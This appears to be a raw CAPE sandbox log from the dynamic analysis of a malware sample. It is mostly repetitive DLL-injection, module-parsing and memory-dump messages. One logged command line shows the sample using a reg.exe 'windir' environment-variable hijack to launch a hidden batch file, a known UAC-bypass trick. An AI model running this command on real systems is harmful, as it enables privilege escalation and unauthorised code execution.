2020-03-24 10:13:15,072 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,072 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,072 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:15,072 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:15,072 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:15,072 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:15,072 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:15,072 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:15,072 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:15,072 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:15,072 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:15,072 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,072 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,072 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,072 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,072 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:15,072 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:15,072 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,072 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:15,072 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:15,072 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:15,072 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:15,072 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:15,072 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:15,072 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:15,072 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:15,072 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,072 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,072 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,072 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:15,072 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,072 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,072 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,088 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,088 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,088 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,088 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,088 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,088 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,088 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:15,088 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:15,088 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:15,088 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:15,088 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:15,088 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:15,088 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:15,088 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:15,088 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\psapi.dll
2020-03-24 10:13:15,088 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\psapi.dll
2020-03-24 10:13:15,088 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\ws2_32.dll
2020-03-24 10:13:15,088 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ws2_32.dll
2020-03-24 10:13:15,088 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\nsi.dll
2020-03-24 10:13:15,088 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\nsi.dll
2020-03-24 10:13:15,088 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\imm32.dll
2020-03-24 10:13:15,088 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\imm32.dll
2020-03-24 10:13:15,088 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,088 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\msctf.dll
2020-03-24 10:13:15,088 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\msctf.dll
2020-03-24 10:13:15,088 [root] DEBUG: DumpProcessFixImports: Instantiating PeParser with address: 0x00E30000
2020-03-24 10:13:15,088 [root] DEBUG: DumpProcessFixImports: Module entry point VA is 0x00E31BCA
2020-03-24 10:13:15,088 [root] DEBUG: Module image dump success
2020-03-24 10:13:15,088 [root] DEBUG: DumpProcessFixImports: Found IAT - 0xe30ffc, size: 0x1ec
2020-03-24 10:13:15,088 [root] DEBUG: IAT parsing finished, found 116 valid APIs, missed 0 APIs
2020-03-24 10:13:15,104 [root] DEBUG: Adding module to module list: advapi32.dll
2020-03-24 10:13:15,104 [root] DEBUG: Adding module to module list: kernel32.dll
2020-03-24 10:13:15,104 [root] DEBUG: Adding module to module list: msvcrt.dll
2020-03-24 10:13:15,104 [root] DEBUG: Adding module to module list: ntdll.dll
2020-03-24 10:13:15,104 [root] DEBUG: Adding module to module list: user32.dll
2020-03-24 10:13:15,104 [root] DEBUG: Adding module to module list: ws2_32.dll
2020-03-24 10:13:15,104 [root] DEBUG: Adding module to module list: shlwapi.dll
2020-03-24 10:13:15,104 [root] DEBUG: Warning - IAT is not inside the PE image, requires rebasing.
2020-03-24 10:13:15,104 [root] DEBUG: Invalid PE file: import table rebuild failed.
2020-03-24 10:13:15,104 [root] DEBUG: Import table rebuild failed, falling back to unfixed dump.
2020-03-24 10:13:15,104 [root] INFO: Added new CAPE file to list with path: C:\uGrmFZ\CAPE\2352_114937640815132024232020
2020-03-24 10:13:23,917 [root] DEBUG: DoProcessDump: Full process memory dump saved to file: C:\uGrmFZ\memory\2352.dmp.
2020-03-24 10:13:23,917 [root] DEBUG: DLL unloaded from 0x75140000.
2020-03-24 10:13:23,917 [root] INFO: Notified of termination of process with pid 2352.
2020-03-24 10:13:23,933 [root] INFO: Announced 32-bit process name: reg.exe pid: 1592
2020-03-24 10:13:23,933 [lib.api.process] INFO: Option 'procmemdump' with value '1' sent to monitor
2020-03-24 10:13:23,933 [lib.api.process] INFO: Option 'import_reconstruction' with value '1' sent to monitor
2020-03-24 10:13:23,933 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2020-03-24 10:13:23,933 [lib.api.process] INFO: 32-bit DLL to inject is C:\lwhhhat\dll\vPbvFKVS.dll, loader C:\lwhhhat\bin\RjSTiJo.exe
2020-03-24 10:13:23,980 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\pOpDnJNJHI.
2020-03-24 10:13:23,980 [root] DEBUG: Loader: Injecting process 1592 (thread 856) with C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:23,980 [root] DEBUG: Process image base: 0x00C80000
2020-03-24 10:13:23,980 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:23,980 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-03-24 10:13:23,980 [root] DEBUG: Successfully injected DLL C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:23,996 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 1592
2020-03-24 10:13:23,996 [root] INFO: Announced 32-bit process name: reg.exe pid: 1592
2020-03-24 10:13:23,996 [lib.api.process] INFO: Option 'procmemdump' with value '1' sent to monitor
2020-03-24 10:13:23,996 [lib.api.process] INFO: Option 'import_reconstruction' with value '1' sent to monitor
2020-03-24 10:13:23,996 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2020-03-24 10:13:23,996 [lib.api.process] INFO: 32-bit DLL to inject is C:\lwhhhat\dll\vPbvFKVS.dll, loader C:\lwhhhat\bin\RjSTiJo.exe
2020-03-24 10:13:24,010 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\pOpDnJNJHI.
2020-03-24 10:13:24,010 [root] DEBUG: Loader: Injecting process 1592 (thread 856) with C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:24,010 [root] DEBUG: Process image base: 0x00C80000
2020-03-24 10:13:24,010 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:24,010 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2020-03-24 10:13:24,026 [root] DEBUG: Successfully injected DLL C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:24,026 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 1592
2020-03-24 10:13:24,026 [root] DEBUG: Terminate processes on terminate_event enabled.
2020-03-24 10:13:24,042 [root] DEBUG: Full process memory dumps enabled.
2020-03-24 10:13:24,042 [root] DEBUG: Import reconstruction of process dumps enabled.
2020-03-24 10:13:24,058 [root] DEBUG: Process dumps enabled.
2020-03-24 10:13:24,058 [root] INFO: Disabling sleep skipping.
2020-03-24 10:13:24,073 [root] DEBUG: RestoreHeaders: Restored original import table.
2020-03-24 10:13:24,073 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 1592 at 0x74880000, image base 0xc80000, stack from 0x166000-0x170000
2020-03-24 10:13:24,073 [root] DEBUG: Commandline: C:\Users\Public\reg  add hkcu\Environment \v windir \d "cmd \c start \min  C:\Users\Public\Yako.bat reg  delete hkcu\Environment \v windir \f && REM ".
2020-03-24 10:13:24,073 [root] INFO: Added new process to list with pid: 1592
2020-03-24 10:13:24,073 [root] INFO: Monitor successfully loaded in process with pid 1592.
2020-03-24 10:13:24,073 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 1592
2020-03-24 10:13:24,088 [root] DEBUG: GetHookCallerBase: thread 856 (handle 0x0), return address 0x00C81CAD, allocation base 0x00C80000.
2020-03-24 10:13:24,088 [root] DEBUG: DoProcessDump: Created dump file for full process memory dump: C:\uGrmFZ\memory\1592.dmp.
2020-03-24 10:13:25,150 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x00C80000.
2020-03-24 10:13:25,150 [root] DEBUG: ApiReader: module list size: 20
2020-03-24 10:13:25,150 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,165 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,165 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:25,165 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:25,165 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,165 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,180 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,180 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,180 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,197 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,197 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,211 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,211 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,211 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,211 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,211 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,211 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,211 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,211 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,211 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,227 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,227 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,227 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,227 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,227 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,227 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,259 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,259 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,259 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,259 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,259 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,259 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,275 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,305 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,305 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,305 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,305 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,322 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,336 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,352 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,384 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,384 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,400 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,400 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,414 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,414 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,414 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,414 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,414 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,430 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,446 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,446 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,446 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,446 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,446 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,446 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,461 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,461 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,477 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,477 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,477 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,477 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,477 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,477 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,477 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,477 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,477 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,477 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,477 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,493 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,509 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,509 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\KernelBase.dll
2020-03-24 10:13:25,509 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\KernelBase.dll
2020-03-24 10:13:25,509 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,523 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,523 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,523 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,523 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,539 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,539 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,539 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,555 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,555 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,555 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,555 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,555 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,555 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,555 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,555 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,555 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,571 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,571 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,571 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,586 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,586 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,586 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,586 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,586 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,601 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,601 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,601 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
